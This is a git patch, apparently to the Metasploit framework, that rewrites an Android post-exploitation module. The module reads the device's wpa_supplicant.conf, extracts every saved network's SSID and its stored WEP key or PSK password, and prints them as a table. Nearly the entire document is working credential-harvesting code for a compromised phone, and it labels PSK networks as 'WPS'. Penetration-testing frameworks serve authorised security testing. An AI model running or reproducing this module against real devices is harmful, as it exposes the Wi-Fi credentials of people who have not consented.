From 29467c2e3734d0e416177059cd7a20973eb1831b Mon Sep 17 00:00:00 2001
From: Auxilus <raghavsphadke@gmail.com>
Date: Tue, 1 May 2018 22:58:17 +0530
Subject: [PATCH] Stylize the output

---
 modules/post/android/gather/wireless_ap.rb | 57 ++++++++++++++++++----
 1 file changed, 48 insertions(+), 9 deletions(-)

diff --git a/modules/post/android/gather/wireless_ap.rb b/modules/post/android/gather/wireless_ap.rb
index 2863d03890..700d344a33 100644
--- a/modules/post/android/gather/wireless_ap.rb
+++ b/modules/post/android/gather/wireless_ap.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Post
 
   include Msf::Post::Common
   include Msf::Post::File
-  include Msf::Post::Android::Priv
   include Msf::Post::Android::System
 
   def initialize(info={})
@@ -25,19 +24,59 @@ class MetasploitModule < Msf::Post
         'Platform'       => 'android',
       }
     ))
-    register_options([
-      OptString.new('SU_BINARY', [true, 'The su binary to execute root commands', 'su'])
-    ])
   end
 
   def run
-    unless file?("/system/xbin/#{datastore['SU_BINARY']}")
-      print_error("No su binary found")
-      return
+    data = read_file("/data/misc/wifi/wpa_supplicant.conf")
+    parsed = data.split("network=")
+    aps ||= []
+    parsed.each do |block|
+      next if block.split("ssid")[1].nil?
+      ssid = block.split("ssid")[1].split("=")[1].split("\n").first.gsub(/"/, '')
+      if search_token(block, "wep_key0")
+        net_type = "WEP"
+      elsif search_token(block, "psk")
+        net_type = "WPS"
+      else
+        net_type = "OPEN"
+      end
+      case net_type
+        when "WEP"
+          pwd = get_password(block, "wep_key0")
+        when "WPS"
+          pwd = get_password(block, "psk")
+        else
+          pwd = ''
+      end
+      aps << [ssid, net_type, pwd]
     end
 
-    data = su_exec("cat /data/misc/wifi/wpa_supplicant.conf", datastore['SU_BINARY'])
-    print_line(data)
+    ap_tbl = Rex::Text::Table.new(
+      'Header'  => 'Wireless APs',
+      'Indent'  => 1,
+      'Columns' => ['SSID','net_type', 'password']
+    )
+
+    aps.each do |ap|
+      ap_tbl << [
+        ap[0],
+        ap[1],
+        ap[2]
+      ]
+    end
+
+    print_line(ap_tbl.to_s)
   end
 
+  def search_token(block, token)
+    if block.to_s.include?(token)
+      return true
+    else
+      return false
+    end
+  end
+
+  def get_password(block, token)
+    return block.split(token)[1].split("=")[1].split("\n").first.gsub(/"/, '')
+  end
 end